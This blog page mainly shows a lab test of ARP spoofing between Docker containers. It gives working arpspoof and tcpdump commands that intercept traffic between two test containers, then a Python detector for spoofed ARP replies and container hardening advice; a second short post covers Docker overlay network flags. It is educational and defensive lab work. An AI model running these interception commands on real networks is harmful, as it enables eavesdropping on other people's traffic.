Thursday, January 26, 2017

ARP spoofing Docker containers


ARP spoofing is a relatively old hacking technique to intercept traffic on switched/bridged networks. It is essentially a mechanism to poison the ARP cache used by systems to find the MAC address of a certain host. Google searches will yield lots of information about the topic if you need further reading.

This write-up simply validates whether the technique still works in containerized environments.

So let’s create a test environment to prove the point.

docker-machine create \
--driver digitalocean \
--digitalocean-access-token=d68aa…65b14e \
spooftest

Open a few terminals to make the testing easy

docker-machine ssh spooftest

On terminal 1, create the required containers
# docker build -t arpspoof - <<EOF
FROM debian
RUN apt-get update && apt-get install -y dsniff
EOF

# docker build -t tcpdump - <<EOF
FROM ubuntu
RUN apt-get update && apt-get install -y tcpdump
CMD tcpdump -n -i eth0
EOF

On terminal 2, create a busybox container named box1
# docker run -it --name box1 busybox
/ # ifconfig
eth0      Link encap:Ethernet  HWaddr 02:42:AC:11:00:04
          inet addr:172.17.0.4  Bcast:0.0.0.0  Mask:255.255.0.0
          inet6 addr: fe80::42:acff:fe11:4/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:7 errors:0 dropped:0 overruns:0 frame:0
          TX packets:6 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:550 (550.0 B)  TX bytes:508 (508.0 B)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

/ #

On terminal 3, create a busybox container named box2
# docker run -it --name box2 busybox
/ # ifconfig
eth0      Link encap:Ethernet  HWaddr 02:42:AC:11:00:05
          inet addr:172.17.0.5  Bcast:0.0.0.0  Mask:255.255.0.0
          inet6 addr: fe80::42:acff:fe11:5/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:7 errors:0 dropped:0 overruns:0 frame:0
          TX packets:5 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:550 (550.0 B)  TX bytes:418 (418.0 B)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

/ # ping 172.17.0.4

On terminal 1, launch the arpspoof attack
# docker run -it --name arpspoofer arpspoof
arpspoof -i eth0  -t 172.17.0.5 172.17.0.4 &
arpspoof -i eth0  -t 172.17.0.4 172.17.0.5 &

On terminal 4, launch a tcpdump in the arpspoofer's network namespace to verify the arpspoof taking place
docker run -it --name tcpdumper --net=container:arpspoofer tcpdump

Traffic should be relayed through the arpspoof container!
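As an added example that is not part of the original post, here is a small detector for the other side of this test: it reads tcpdump -n ARP output (what the tcpdumper container above prints), reports every IP whose is-at MAC flips, and lists MACs that answer for more than one IP. The timestamps and the spoofer MAC 02:42:ac:11:00:06 in the sample are constructed; the .4 and .5 addresses are box1 and box2 from the write-up.

```python
import re
from collections import defaultdict

# Matches tcpdump -n ARP reply lines such as
# "12:00:00.100200 ARP, Reply 172.17.0.4 is-at 02:42:ac:11:00:04, length 28"
ARP_REPLY = re.compile(
    r"^(?P<ts>\S+) ARP, Reply (?P<ip>\d+\.\d+\.\d+\.\d+) is-at "
    r"(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})", re.IGNORECASE)

def parse_arp_replies(lines):
    """Yield (timestamp, ip, mac) for each ARP reply; other lines are skipped."""
    for line in lines:
        m = ARP_REPLY.match(line.strip())
        if m:
            yield m.group("ts"), m.group("ip"), m.group("mac").lower()

def find_spoofed_bindings(lines):
    """Return (timestamp, ip, old_mac, new_mac) each time an IP's claimed MAC changes.
    The binding is updated on every reply, so repeated identical spoof replies are
    not re-reported, while a flip back to the genuine MAC is."""
    current, flips = {}, []
    for ts, ip, mac in parse_arp_replies(lines):
        old = current.get(ip)
        if old is not None and old != mac:
            flips.append((ts, ip, old, mac))
        current[ip] = mac
    return flips

def macs_claiming_multiple_ips(lines):
    """Return {mac: [ips]} for MACs answering for more than one IP (spoofers
    impersonate both ends of a conversation)."""
    claims = defaultdict(set)
    for _, ip, mac in parse_arp_replies(lines):
        claims[mac].add(ip)
    return {mac: sorted(ips) for mac, ips in claims.items() if len(ips) > 1}

# Constructed sample: box1 (.4) and box2 (.5) answer normally, then a spoofer with
# the made-up MAC 02:42:ac:11:00:06 claims both addresses every two seconds.
SAMPLE = """\
12:00:00.100000 ARP, Request who-has 172.17.0.4 tell 172.17.0.5, length 28
12:00:00.100200 ARP, Reply 172.17.0.4 is-at 02:42:ac:11:00:04, length 28
12:00:00.200000 ARP, Reply 172.17.0.5 is-at 02:42:ac:11:00:05, length 28
12:00:02.000000 ARP, Reply 172.17.0.4 is-at 02:42:ac:11:00:06, length 28
12:00:02.000100 ARP, Reply 172.17.0.5 is-at 02:42:ac:11:00:06, length 28
12:00:04.000000 ARP, Reply 172.17.0.4 is-at 02:42:ac:11:00:06, length 28
""".splitlines()

if __name__ == "__main__":
    for ts, ip, old, new in find_spoofed_bindings(SAMPLE):
        print(f"{ts} {ip} changed from {old} to {new}")
    print("MACs answering for several IPs:", macs_claiming_multiple_ips(SAMPLE))
```

Containers get CAP_NET_RAW by default, which is what arpspoof needs to forge frames; starting workloads with --cap-drop NET_RAW removes that ability, and putting untrusted containers on separate user-defined networks keeps them off the same L2 segment as the containers they would target.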

Monday, January 16, 2017

Networking update on DOCKER 1.13.0-rc6 (beta)

As pointed out in my previous blog post, it was not possible to connect containers to a SWARM OVERLAY network used by the service.

Docker v1.13 introduces the --attachable flag for network creation.

You can now create networks as follows:
docker network create --attachable --driver overlay net-1

Creating a service did not change, so:
docker service create  --name nginx --network net-1 --replicas 3  -p 80:80  nginx

Instead of running your test containers as a service or using other fancy tricks, we can now simply test with:
docker run -it --rm --network net-1 xxradar/hackon ping nginx

Happy testing!